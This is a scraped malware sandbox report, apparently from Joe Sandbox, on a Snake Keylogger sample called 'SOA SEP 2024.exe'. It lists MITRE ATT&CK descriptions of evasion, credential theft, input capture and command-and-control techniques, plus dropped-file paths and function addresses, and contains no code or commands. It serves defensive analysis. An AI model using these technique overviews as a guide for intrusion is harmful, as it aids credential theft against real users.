Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SOA SEP 2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut6260.tmp

C:\Users\user\AppData\Local\Temp\bankrupture

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
SOA SEP 2024.exe

Function 0078B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00763D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Function 0077DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 0076406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 007AFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Function 00763F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 007ABFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00763742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00763E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 00D685A0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 007649FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 007636B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 00D68370 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
fileCOMMON

Function 00764139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre